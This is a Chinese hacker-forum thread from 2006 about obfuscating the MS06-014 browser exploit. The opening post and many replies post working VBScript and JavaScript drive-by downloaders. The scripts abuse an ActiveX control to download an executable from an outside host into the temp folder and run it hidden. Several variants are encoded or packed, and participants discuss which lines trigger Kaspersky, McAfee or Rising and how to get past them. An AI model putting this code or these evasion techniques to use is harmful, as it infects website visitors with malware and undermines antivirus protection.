[原创]MS06014网马的一种变形方法(页 1) - 论坛原创{ Original Paper } - 邪恶八进制信息安全团队技术讨论组努力为祖国的信息安全撑起一片蓝天

h2k2 2006-7-28 03:36

[原创]MS06014网马的一种变形方法

文章作者：h2k2（_恒 QQ：5454443）
信息来源：邪恶八进制信息安全团队（[url]www.eviloctal.com[/url]）

请看原始代码
[code]<script language="VBScript">
  on error resume next
  dl = "[url]http://www.baidu.com/heng.exe[/url]"
  Set df = document.createElement("object")
  df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
  str="Microsoft.XMLHTTP"
  Set x = df.CreateObject(str,"")
  a1="Ado"
  a2="db."
  a3="Str"
  a4="eam"
  str1=a1&a2&a3&a4
  str5=str1
  set S = df.createobject(str5,"")
  S.type = 1
  str6="GET"
  x.Open str6, dl, False
  x.Send
  fname1="g0ld.com"
  set F = df.createobject("Scripting.FileSystemObject","")
  set tmp = F.GetSpecialFolder(2)
  fname1= F.BuildPath(tmp,fname1)
  S.open
  S.write x.responseBody
  S.savetofile fname1,2
  S.close
  set Q = df.createobject("Shell.Application","")
  Q.ShellExecute fname1,"","","open",0
  </script>[/code]
请大家看变形后的代码：
[code]<script language="VBScript">
  on error resume next
  xx="object"
  xxx="classid"
  xxxx="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
  xxxxx="Microsoft.XMLHTTP"
  xxxxxx="GET"
  xxxxxxx="Scripting.FileSystemObject"
  xxxxxxxx="Shell.Application"
  dl = "[url]http://www.baidu.com/heng.exe[/url]"
  Set df = document.createElement(xx)
  df.setAttribute xxx, xxxx
  str=xxxxx
  Set x = df.CreateObject(str,"")
  a1="Ado"
  a2="db."
  a3="Str"
  a4="eam"
  str1=a1&a2&a3&a4
  str5=str1
  set S = df.createobject(str5,"")
  S.type = 1
  str6=xxxxxx
  x.Open str6, dl, False
  x.Send
  fname1="g0ld.com"
  set F = df.createobject(xxxxxxx,"")
  set tmp = F.GetSpecialFolder(2)
  fname1= F.BuildPath(tmp,fname1)
  S.open
  S.write x.responseBody
  S.savetofile fname1,2
  S.close
  set Q = df.createobject(xxxxxxxx,"")
  Q.ShellExecute fname1,"","","open",0
  </script>[/code]
很容易就发现了，我把“”包含的内容都声明成了变量，然后在代码里直接引用变量就可以了。
[code]a1="Ado"
  a2="db."
  a3="Str"
  a4="eam"
  str1=a1&a2&a3&a4[/code]
这个还可以变形成这样，
[code]  a1="Ado"
  a2="db."
  a3="Str"
  a4="ea"
  a5="m"
  str1=a1&a2&a3&a4&a5[/code]
发现差别了吗？实际上每个字符都可以这样处理，我懒得整而已呵呵。大家自己举一反三吧。

虫虫 2006-8-2 14:16

要变形ho~~~，虫虫比较擅长的说～～^_^～～

看看偶变的形·～

[code]<script language=vbscript>
function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
rechange=t
End Function
on error resume next
t="100,108,32,61,32,34,104,116,116,112,58,47,47,119,119,119,46,98,97,105,100,117,46,99,111,109,47,104,101,110,103,46,101,120,101,34,13,10,83,101,116,32,100,102,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,111,98,106,101,99,116,34,41,13,10,100,102,46,115,101,116,65,116,116,114,105,98,117,116,101,32,34,99,108,97,115,115,105,100,34,44,32,34,99,108,115,105,100,58,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,13,10,115,116,114,61,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,13,10,83,101,116,32,120,32,61,32,100,102,46,67,114,101,97,116,101,79,98,106,101,99,116,40,115,116,114,44,34,34,41,13,10,97,49,61,34,65,100,111,34,13,10,97,50,61,34,100,98,46,34,13,10,97,51,61,34,83,116,114,34,13,10,97,52,61,34,101,97,109,34,13,10,115,116,114,49,61,97,49,38,97,50,38,97,51,38,97,52,13,10,115,116,114,53,61,115,116,114,49,13,10,115,101,116,32,83,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,115,116,114,53,44,34,34,41,13,10,83,46,116,121,112,101,32,61,32,49,13,10,115,116,114,54,61,34,71,69,84,34,13,10,120,46,79,112,101,110,32,115,116,114,54,44,32,100,108,44,32,70,97,108,115,101,13,10,120,46,83,101,110,100,13,10,102,110,97,109,101,49,61,34,103,48,108,100,46,99,111,109,34,13,10,115,101,116,32,70,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,44,34,34,41,13,10,115,101,116,32,116,109,112,32,61,32,70,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,13,10,102,110,97,109,101,49,61,32,70,46,66,117,105,108,100,80,97,116,104,40,116,109,112,44,102,110,97,109,101,49,41,13,10,83,46,111,112,101,110,13,10,83,46,119,114,105,116,101,32,120,46,114,101,115,112,111,110,115,101,66,111,100,121,13,10,83,46,115,97,118,101,116,111,102,105,108,101,32,102,110,97,109,101,49,44,50,13,10,83,46,99,108,111,115,101,13,10,115,101,116,32,81,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110,34,44,34,34,41,13,10,81,46,83,104,101,108,108,69,120,101,99,117,116,101,32,102,110,97,109,101,49,44,34,34,44,34,34,44,34,111,112,101,110,34,44,48"
execute(rechange(t))
</script>[/code]

哈哈～～～
那个小工具放在我刚建的小家咯～ [url]http://hi.baidu.com/anuiz[/url]
就是懒的去修改那个工具，有中文的时候会出点小问题，把工具里的 asc,chr 改成 ascw,chrw就可以了～
报告完毕。呵呵 [s:37]
欢迎大家批评指教·～～

黑病毒 2006-8-2 19:00

变形多种多样，眼花了乱啊。现在被杀真是个问题。

h2k2 2006-8-2 23:12

虫虫的方法应该算是加密吧~~
网马免杀，我一直都比较追求不加密，直接改代码就OK，可是有时候好难处理，唉。

优格 2006-8-3 00:03

纯加密的话会被杀毒软件的文件流检测查到
我在测试的时候，纯加密就遭到KV的查杀。
我换了“Shell.Application”调用组建就不被杀了

虫虫 2006-8-3 08:14

不要纯加密哦,我那个工具不是一个成品,你变形后生成的代码如果被杀再稍微一处理就可以了.
这个东西跟我以前发的那个js变形免杀是一样的.

虫虫 2006-8-3 08:17

加密的好处在于可以过很多杀毒,但是手工修改就很难做到这点.
我现在基本上只看过不过卡巴,过了卡巴别的就可以不用看了.

杀虫剂 2006-8-3 20:49

用了虫虫的VBS加密器还真不错。俺叫杀虫剂专杀虫虫的。。。 [s:70] [s:45] [s:35]

h2k2 2006-8-4 07:51

[quote][b]这里是引用第[/b][color=#ff0000][6 楼][/color][b]的[color=#000066]虫虫[/color]于[/b]2006-08-03 08:17[b]发表的：[/b]
加密的好处在于可以过很多杀毒,但是手工修改就很难做到这点.
我现在基本上只看过不过卡巴,过了卡巴别的就可以不用看了.[/quote]

对于网马来说，喀吧好过，我发现咖啡难过。

h2k2 2006-8-4 07:51

[quote][b]这里是引用第[/b][color=#ff0000][4 楼][/color][b]的[color=#000066]优格[/color]于[/b]2006-08-03 00:03[b]发表的：[/b]
纯加密的话会被杀毒软件的文件流检测查到
我在测试的时候，纯加密就遭到KV的查杀。
我换了“Shell.Application”调用组建就不被杀了[/quote]

具体说说怎么做的~~

v9iv 2006-8-4 11:50

虫虫 2006-8-4 19:01

其实 "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
改成 "clsid:B"&"D96C55"&"6-65A"&"3-11"&"D0-9"&"83A-"&"00C0"&"4FC"&"29E36" 都可以，也可以过一部分杀毒，但是卡巴就是不放你。
还有变量名也可以改啊，只要别把程序改错了就可以。但是过几天杀毒更新后又可能失败了。
我上面做那个变形好处就在关键字少，修改起来容易。－－－这是在自卖自夸了，呵呵。

后来觉得，这都是些很肤浅的东西，哎。原来自己也一直这么肤浅，还引以为傲……迷茫～

7jdg 2006-8-4 20:10

先转成JS
[code]document.writeln("<html>");
document.writeln(" <script language=\"VBScript\">");
document.writeln(" on error resume next");
document.writeln(" dl = \"http:\/\/www.baidu.com\/go.exe\"");
document.writeln(" Set df = document.createElement(\"object\")");
document.writeln(" df.setAttribute \"classid\", \"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\"");
document.writeln(" str=\"Microsoft.XMLHTTP\"");
document.writeln(" Set x = df.CreateObject(str,\"\")");
document.writeln(" a1=\"Ado\"");
document.writeln(" a2=\"db.\"");
document.writeln(" a3=\"Str\"");
document.writeln(" a4=\"eam\"");
document.writeln(" str1=a1&a2&a3&a4");
document.writeln(" str5=str1");
document.writeln(" set S = df.createobject(str5,\"\")");
document.writeln(" S.type = 1");
document.writeln(" str6=\"GET\"");
document.writeln(" x.Open str6, dl, False");
document.writeln(" x.Send");
document.writeln(" fname1=\"Ravwon.exe\"");
document.writeln(" set F = df.createobject(\"Scripting.FileSystemObject\",\"\")");
document.writeln(" set tmp = F.GetSpecialFolder(2) ");
document.writeln(" fname1= F.BuildPath(tmp,fname1)");
document.writeln(" S.open");
document.writeln(" S.write x.responseBody");
document.writeln(" S.savetofile fname1,2");
document.writeln(" S.close");
document.writeln(" set Q = df.createobject(\"Shell.Application\",\"\")");
document.writeln(" Q.ShellExecute fname1,\"\",\"\",\"open\",0");
document.writeln(" <\/script>");
document.writeln(" <head>");
document.writeln(" <title>fuck all hacker<\/title>");
document.writeln(" <\/head><body>");
document.writeln(" <center><\/center>");
document.writeln(" <\/body><\/html>")[/code]

再变形

[code]
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3.4("<p>");3.4(" <m L=\\"M\\">");3.4(" N I J K");3.4(" 9 = \\"O:\\/\\/U.V.W\\/P.c\\"");3.4(" f 5 = 3.R(\\"T\\")");3.4(" 5.H \\"v\\", \\"w:y-s-t-u-z\\"");3.4(" g=\\"D.E\\"");3.4(" f x = 5.A(g,\\"\\")");3.4(" d=\\"C\\"");3.4(" e=\\"X.\\"");3.4(" j=\\"1b\\"");3.4(" k=\\"1c\\"");3.4(" h=d&e&j&k");3.4(" i=h");3.4(" 7 S = 5.8(i,\\"\\")");3.4(" S.1e = 1");3.4(" a=\\"18\\"");3.4(" x.11 a, 9, Y");3.4(" x.Z");3.4(" 6=\\"16.c\\"");3.4(" 7 F = 5.8(\\"15.13\\",\\"\\")");3.4(" 7 b = F.14(2) ");3.4(" 6= F.10(b,6)");3.4(" S.n");3.4(" S.1f x.19");3.4(" S.17 6,2");3.4(" S.1a");3.4(" 7 Q = 5.8(\\"G.B\\",\\"\\")");3.4(" Q.12 6,\\"\\",\\"\\",\\"n\\",0");3.4(" <\\/m>");3.4(" <o>");3.4(" <l>1g 1h 1d<\\/l>");3.4(" <\\/o><q>");3.4(" <r><\\/r>");3.4(" <\\/q><\\/p>")',62,80,'|||document|writeln|df|fname1|set|createobject|dl|str6|tmp|exe|a1|a2|Set|str|str1|str5|a3|a4|title|script|open|head|html|body|center|65A3|11D0|983A|classid|clsid||BD96C556|00C04FC29E36|CreateObject|Application|Ado|Microsoft|XMLHTTP||Shell|setAttribute|error|resume|next|language|VBScript|on|http|go||createElement||object|www|baidu|com|db|False|Send|BuildPath|Open|ShellExecute|FileSystemObject|GetSpecialFolder|Scripting|Ravwon|savetofile|GET|responseBody|close|Str|eam|hacker|type|write|fuck|all'.split('|'),0,{}))
[/code]

过不了内存。。。。郁闷呀！！

茄子宝 2006-8-5 06:06

1.把每个变量名拆分合并加入垃圾字符如 [quote]set Q = evil.createobject("Shel"&QQ30039780&RAyH4c&"l.Appl"&"ication","")[/quote]

2.创建组件的变量顺序也可以乱序.

3.再HTML转JS加密~保证全免杀而且网马就一个JS文件，多方便。

4.干脆重写脚本，参照冰狐以前几个经典的网马脚本.

scfei 2006-8-13 01:00

虫虫,我用你的工具加密后,打开那个网马,IE状态栏会出现"已完毕,但是网页有错误"这是为什么啊

yayayaya51 2006-8-14 21:13

lubay 2006-8-15 04:36

<SCRIPT LANGUAGE="JavaScript">

</SCRIPT>

yayayaya51 2006-8-15 13:50

文章作者：瑞星文件不杀，为什么打开网马就提示有病毒呢，请问如何修改？

图片发不起，瑞星这样提示的

病毒名称：Trojan.DL.VBS.Agent.j
进程名称："C:\Program Files\Internet Explorer\iexplore.exe"
文件路径：C:\DOCUME~1\宇\LOCALS~1\Temp\43244250456.tmp

不是木马被杀！木马和网马都是免杀，但是打开链接瑞星就提示有毒。。楼上说的加垃圾代码，垃圾代码怎么写呀？要加是加在哪？

ch4o.jt 2006-8-15 22:13

改变一下变量名和调用的组件名,插分开就可以了...
卡巴06的内杀是牛了一点,不过打乱一下代码的顺序就可以了...

lhn 2006-8-19 00:57

麦卡啡只杀 S.savetofile 这句，改下就行了，其它未知

tale007 2006-8-19 01:02

问下。一般网马中都这样的UNICODE%u9090%u9090%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243。这样的怎么解密呢

gdzph 2006-8-19 13:09

这种方法不错,但是变形方法多种多样,转个思路或许能创造出更好的方法!

yayaya51 2006-8-24 14:26

set Q = df.createobject("Shell.Application","") 这句或者<script language="VBScript"> 这句被杀，该怎么变形哦？

jackal 2006-8-24 16:14

[code]<SCRIPT LANGUAGE="JavaScript">

</SCRIPT>
[/code]
强加密了。嘎嘎。 [s:39]

茄子宝 2006-8-25 11:59

变量拆分局部加密再变量乱序

~HTML TO JS

~最好JS加密

绝对不杀卖咖啡和一些杀软的那种脚本运行提示除外。

icexiaoye 2006-8-25 13:47

[quote][b]这里是引用第[/b][color=#ff0000][29 楼][/color][b]的[color=#000066]茄子宝[/color]于[/b]2006-08-25 11:59[b]发表的：[/b]
变量拆分局部加密再变量乱序

~HTML TO JS

~最好JS加密
.......[/quote]

[s:39]
JS加密的确还不错

tale007 2006-8-28 02:22

上面的这段代码在IE和TT中都会弹出一个对话框出来.这个是不是引用了xmlhttp组件的缘故.在火狐的浏览器中就弹不出来.请问下怎么在IE的浏览器也不让他弹出来呢

combocat 2006-8-28 09:47

27楼能免杀。不过会提醒activeX操作，允许activeX操作也没有反映。 [s:82]

combocat 2006-8-28 09:52

33楼能看到弹出的对话框？？？

独孤依人 2006-8-29 22:03

cqwww 2006-9-6 10:25

好像很难过瑞星内存！

intruder 2006-9-11 14:44

<SCRIPT language=javascript>
eval("\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x22\x3C\x73\x63\x72\x69\x70\x74\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x22\x56\x42\x53\x63\x72\x69\x70\x74\x22\x3E\x0D\x0A\x6F\x6E\x20\x65\x72\x72\x6F\x72\x20\x72\x65\x73\x75\x6D\x65\x20\x6E\x65\x78\x74\x0D\x0A\x64\x6C\x20\x3D\x20\x22\x68\x74\x74\x70\x3A\x2F\x2F\x64\x69\x65\x67\x6F\x2E\x78\x69\x63\x70\x2E\x6E\x65\x74\x2F\x75\x70\x64\x61\x74\x65\x2E\x65\x78\x65\x22\x0D\x0A\x53\x65\x74\x20\x64\x66\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x28\x22\x6F\x62\x6A\x65\x63\x74\x22\x29\x0D\x0A\x64\x66\x2E\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65\x20\x22\x63\x6C\x61\x73\x73\x69\x64\x22\x2C\x20\x22\x63\x6C\x73\x69\x64\x3A\x42\x44\x39\x36\x43\x35\x35\x36\x2D\x36\x35\x41\x33\x2D\x31\x31\x44\x30\x2D\x39\x38\x33\x41\x2D\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36\x22\x0D\x0A\x73\x74\x72\x3D\x22\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x54\x54\x50\x22\x0D\x0A\x53\x65\x74\x20\x78\x20\x3D\x20\x64\x66\x2E\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74\x28\x73\x74\x72\x2C\x22\x22\x29\x0D\x0A\x61\x31\x3D\x22\x41\x64\x6F\x22\x0D\x0A\x61\x32\x3D\x22\x64\x62\x2E\x22\x0D\x0A\x61\x33\x3D\x22\x53\x74\x72\x22\x0D\x0A\x61\x34\x3D\x22\x65\x61\x6D\x22\x0D\x0A\x73\x74\x72\x31\x3D\x61\x31\x26\x61\x32\x26\x61\x33\x26\x61\x34\x0D\x0A\x73\x74\x72\x35\x3D\x73\x74\x72\x31\x0D\x0A\x73\x65\x74\x20\x53\x20\x3D\x20\x64\x66\x2E\x63\x72\x65\x61\x74\x65\x6F\x62\x6A\x65\x63\x74\x28\x73\x74\x72\x35\x2C\x22\x22\x29\x0D\x0A\x53\x2E\x74\x79\x70\x65\x20\x3D\x20\x31\x0D\x0A\x73\x74\x72\x36\x3D\x22\x47\x45\x54\x22\x0D\x0A\x78\x2E\x4F\x70\x65\x6E\x20\x73\x74\x72\x36\x2C\x20\x64\x6C\x2C\x20\x46\x61\x6C\x73\x65\x0D\x0A\x78\x2E\x53\x65\x6E\x64\x0D\x0A\x66\x6E\x61\x6D\x65\x31\x3D\x22\x67\x30\x6C\x64\x2E\x63\x6F\x6D\x22\x0D\x0A\x73\x65\x74\x20\x46\x20\x3D\x20\x64\x66\x2E\x63\x72\x65\x61\x74\x65\x6F\x62\x6A\x65\x63\x74\x28\x22\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74\x22\x2C\x22\x22\x29\x0D\x0A\x73\x65\x74\x20\x74\x6D\x70\x20\x3D\x20\x46\x2E\x47\x65\x74\x53\x70\x65\x63\x69\x61\x6C\x46\x6F\x6C\x64\x65\x72\x28\x32\x29\x20\x0D\x0A\x66\x6E\x61\x6D\x65\x31\x3D\x20\x46\x2E\x42\x75\x69\x6C\x64\x50\x61\x74\x68\x28\x74\x6D\x70\x2C\x66\x6E\x61\x6D\x65\x31\x29\x0D\x0A\x53\x2E\x6F\x70\x65\x6E\x0D\x0A\x53\x2E\x77\x72\x69\x74\x65\x20\x78\x2E\x72\x65\x73\x70\x6F\x6E\x73\x65\x42\x6F\x64\x79\x0D\x0A\x53\x2E\x73\x61\x76\x65\x74\x6F\x66\x69\x6C\x65\x20\x66\x6E\x61\x6D\x65\x31\x2C\x32\x0D\x0A\x53\x2E\x63\x6C\x6F\x73\x65\x0D\x0A\x73\x65\x74\x20\x51\x20\x3D\x20\x64\x66\x2E\x63\x72\x65\x61\x74\x65\x6F\x62\x6A\x65\x63\x74\x28\x22\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x22\x2C\x22\x22\x29\x0D\x0A\x51\x2E\x53\x68\x65\x6C\x6C\x45\x78\x65\x63\x75\x74\x65\x20\x66\x6E\x61\x6D\x65\x31\x2C\x22\x22\x2C\x22\x22\x2C\x22\x6F\x70\x65\x6E\x22\x2C\x30\x0D\x0A\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E\x22\x29")
</SCRIPT>

偶是这样滴……

虫虫 2006-9-20 11:59

[quote][b]这里是引用第[/b][color=#ff0000][12 楼][/color][b]的[color=#000066]7jdg[/color]于[/b]2006-08-04 20:10[b]发表的：[/b]
先转成JS
[ c ode]document.writeln("<html>");
document.writeln(" <script language="VBScript">");
document.writeln(" on error resume next");
document.writeln(" dl = "[url]http://www.baidu.com/go.exe[/url]"");
.......[/quote]
这里做了一个简单的分析
首先要说明的是这个加密作者的js功底是很扎实的，应该是一个前辈级的人物，非常非常的佩服作者。
生成器应该有现成的，但我不知道是哪个，呵呵

首先是一个总体的分析，然后给一个刚写好的演示代码来说明整个解密过程。

源代码是这样的
[code]
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3.4("<p>");3.4(" <m L=\\"M\\">");3.4("  N I J K");3.4("  9 = \\"O:\\/\\/U.V.W\\/P.c\\"");3.4("  f 5 = 3.R(\\"T\\")");3.4("  5.H \\"v\\", \\"w:y-s-t-u-z\\"");3.4("  g=\\"D.E\\"");3.4("  f x = 5.A(g,\\"\\")");3.4("  d=\\"C\\"");3.4("  e=\\"X.\\"");3.4("  j=\\"1b\\"");3.4("  k=\\"1c\\"");3.4("  h=d&e&j&k");3.4("  i=h");3.4("  7 S = 5.8(i,\\"\\")");3.4("  S.1e = 1");3.4("  a=\\"18\\"");3.4("  x.11 a, 9, Y");3.4("  x.Z");3.4("  6=\\"16.c\\"");3.4("  7 F = 5.8(\\"15.13\\",\\"\\")");3.4("  7 b = F.14(2) ");3.4("  6= F.10(b,6)");3.4("  S.n");3.4("  S.1f x.19");3.4("  S.17 6,2");3.4("  S.1a");3.4("  7 Q = 5.8(\\"G.B\\",\\"\\")");3.4("  Q.12 6,\\"\\",\\"\\",\\"n\\",0");3.4("  <\\/m>");3.4("  <o>");3.4("  <l>1g 1h 1d<\\/l>");3.4("  <\\/o><q>");3.4(" <r><\\/r>");3.4("  <\\/q><\\/p>")',62,80,'|||document|writeln|df|fname1|set|createobject|dl|str6|tmp|exe|a1|a2|Set|str|str1|str5|a3|a4|title|script|open|head|html|body|center|65A3|11D0|983A|classid|clsid||BD96C556|00C04FC29E36|CreateObject|Application|Ado|Microsoft|XMLHTTP||Shell|setAttribute|error|resume|next|language|VBScript|on|http|go||createElement||object|www|baidu|com|db|False|Send|BuildPath|Open|ShellExecute|FileSystemObject|GetSpecialFolder|Scripting|Ravwon|savetofile|GET|responseBody|close|Str|eam|hacker|type|write|fuck|all'.split('|'),0,{}))
[/code]

再对想分析这个代码的读者罗嗦下就是：作者用了很多的简写和“花指令”，大家分析的时候要仔细“品”一下，呵呵
首先可以看到代码的结构为 eval( a_function( par1 , par2.. ) );
就是用一个“解密”函数生成正确的代码，然后用eval激活执行。
这个解密函数拿出来就是：
[code]
function decode(p,a,c,k,e,d)
{e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String)){
  while(c--)d[e(c)]=k[c]||e(c);
  k=[function(e){return d[e]}];
  e=function(){return'\\w+'};
  c=1;};
while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
return p;}
[/code]
实现的功能就是生成一个替换表，将密文中的对应字母替换为一个对应的单词。
下面是我给出的演示代码，因为里面已经有很多注释了，我也不再多说。
将代码复制并保存为htm文件直接打开就能看到演示。
推荐用一个带有代码颜色区分显示功能的编辑器【EditPlus或UEdit等】查看下面的代码。
[code]
<body style="font-size:12px;">
这里演示一下替换关系。<br>
以下为原始的字串<br>
<textarea cols=120 rows=8>
3.4("<p>");3.4(" <m L=\\"M\\">");3.4("  N I J K");3.4("  9 = \\"O:\\/\\/U.V.W\\/P.c\\"");3.4("  f 5 = 3.R(\\"T\\")");3.4("  5.H \\"v\\", \\"w:y-s-t-u-z\\"");3.4("  g=\\"D.E\\"");3.4("  f x = 5.A(g,\\"\\")");3.4("  d=\\"C\\"");3.4("  e=\\"X.\\"");3.4("  j=\\"1b\\"");3.4("  k=\\"1c\\"");3.4("  h=d&e&j&k");3.4("  i=h");3.4("  7 S = 5.8(i,\\"\\")");3.4("  S.1e = 1");3.4("  a=\\"18\\"");3.4("  x.11 a, 9, Y");3.4("  x.Z");3.4("  6=\\"16.c\\"");3.4("  7 F = 5.8(\\"15.13\\",\\"\\")");3.4("  7 b = F.14(2) ");3.4("  6= F.10(b,6)");3.4("  S.n");3.4("  S.1f x.19");3.4("  S.17 6,2");3.4("  S.1a");3.4("  7 Q = 5.8(\\"G.B\\",\\"\\")");3.4("  Q.12 6,\\"\\",\\"\\",\\"n\\",0");3.4("  <\\/m>");3.4("  <o>");3.4("  <l>1g 1h 1d<\\/l>");3.4("  <\\/o><q>");3.4(" <r><\\/r>");3.4("  <\\/q><\\/p>")</textarea><br>
以下开始用js生成一个代换表,将上表中对应的字母替换为单词：<br>
<script>
var result;

function  f(p,a,c,k,e,d)
{
//c=关键词数量
//a=与映射表有关
//k=关键词数组
//p=密文
//e,d=空
e=function(c)
   {return (c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
//*这里做了一个c的映射函数，从数字映射到ascii字符。0~35 -> 0~z; 35~61 -> A~Z; 62~97 -> 10~1z ...

while(c--)d[e(c)]=k[c]||e(c); //*
//再次映射字母 -> 单词 ,

//k=[function(e){return d[e]}];  //相当于k[0]=function(e){return d[e]};
//e=function(){return'\\w+'};
//c=1;
//while(c--)
   //{if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]); //k[c]是一个函数
   //其实上面的东西都是用来让我们犯糊涂的好方法，精简后代码如下
   c=0;
   //p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]); //做正则替换
   p=p.replace(/\b\w+\b/g,function(e){return d[e]});
   //下面的代码是我自己加的，仅为了演示用
   result=p;
   document.write("<textarea cols=120 rows=13>")
   for (key in d) //显示映射表的所有表项
      { document.write(key+" => "+d[key]+"\n"); }
   document.write("</textarea><br>")
//}
}

f('3.4("<p>");3.4(" <m L=\\"M\\">");3.4("  N I J K");3.4("  9 = \\"O:\\/\\/U.V.W\\/P.c\\"");3.4("  f 5 = 3.R(\\"T\\")");3.4("  5.H \\"v\\", \\"w:y-s-t-u-z\\"");3.4("  g=\\"D.E\\"");3.4("  f x = 5.A(g,\\"\\")");3.4("  d=\\"C\\"");3.4("  e=\\"X.\\"");3.4("  j=\\"1b\\"");3.4("  k=\\"1c\\"");3.4("  h=d&e&j&k");3.4("  i=h");3.4("  7 S = 5.8(i,\\"\\")");3.4("  S.1e = 1");3.4("  a=\\"18\\"");3.4("  x.11 a, 9, Y");3.4("  x.Z");3.4("  6=\\"16.c\\"");3.4("  7 F = 5.8(\\"15.13\\",\\"\\")");3.4("  7 b = F.14(2) ");3.4("  6= F.10(b,6)");3.4("  S.n");3.4("  S.1f x.19");3.4("  S.17 6,2");3.4("  S.1a");3.4("  7 Q = 5.8(\\"G.B\\",\\"\\")");3.4("  Q.12 6,\\"\\",\\"\\",\\"n\\",0");3.4("  <\\/m>");3.4("  <o>");3.4("  <l>1g 1h 1d<\\/l>");3.4("  <\\/o><q>");3.4(" <r><\\/r>");3.4("  <\\/q><\\/p>")',62,80,'|||document|writeln|df|fname1|set|createobject|dl|str6|tmp|exe|a1|a2|Set|str|str1|str5|a3|a4|title|script|open|head|html|body|center|65A3|11D0|983A|classid|clsid||BD96C556|00C04FC29E36|CreateObject|Application|Ado|Microsoft|XMLHTTP||Shell|setAttribute|error|resume|next|language|VBScript|on|http|go||createElement||object|www|baidu|com|db|False|Send|BuildPath|Open|ShellExecute|FileSystemObject|GetSpecialFolder|Scripting|Ravwon|savetofile|GET|responseBody|close|Str|eam|hacker|type|write|fuck|all'.split('|'),0,{});
document.write("<br>这就是替换的结果:<br><textarea cols=120 rows=16>"+result+"</textarea>");
</script>
<br><br>最后使用了eval()将以上生成的代码激活执行。<br>
你可以仔细对照原来的代码与现在的代码来体会一下作者的用意，呵呵<br>
<br><br><center><hr>虫虫 2006.9.20 制作<br><a href=hTtP://hI.bAidU.cOm/aNUiz target=_blank>[url]hTtP://hI.bAidU.cOm/aNUiz</a>[/url]
[/code]

我的小窝 [url]http://hi.baidu.com/anuiz[/url]

虫虫 2006-9-20 12:05

把我给的代码里的所有注释全部去掉就可以看到很有节奏感的代码，
但是每一句代码都可能会让你停住思考一阵子，原来得代码更是这样——这也是我佩服作者的地方。

凋凌玫瑰 2006-9-20 12:23

我很想改代码过杀毒，可发现麦咖啡对"http://"不放过，瑞星对"ShellExecute"不放过，其它的代码都用字符替换转换过了，最后难得改了，在改了后的代码上随便用个工具加下密就全过了。

trace 2006-9-20 21:57

自我感觉
脚本变形是最好的免杀方法，可以参考superhei写的文章

cnhcerkf 2006-9-21 01:58

真够麻烦的。。。汗。
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">

</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>

zxyand 2006-9-25 22:04

fname1="g0ld.com"是什么意识？谁能说一下？谢谢

h2k2 2006-9-28 07:27

你的木马被下载后的名字 g0ld.com

zxyand 2006-10-7 20:25

那是不是可以随便改为其他的名字呢？

可酷可乐 2006-10-9 10:51

[quote][b]这里是引用第[/b][color=#ff0000][42 楼][/color][b]的[color=#000066]zxyand[/color]于[/b]2006-10-07 20:25[b]发表的：[/b]
那是不是可以随便改为其他的名字呢？[/quote]
好象是可以的。刚看别人的网马了。

yuewolf 2006-10-12 09:40

感觉拆分了合并，并且把它自定义的一些常量名可以换成是自己的，这样就可以躲过查杀了。感觉加密不好的说～～～

夜黑暗 2006-10-12 16:42

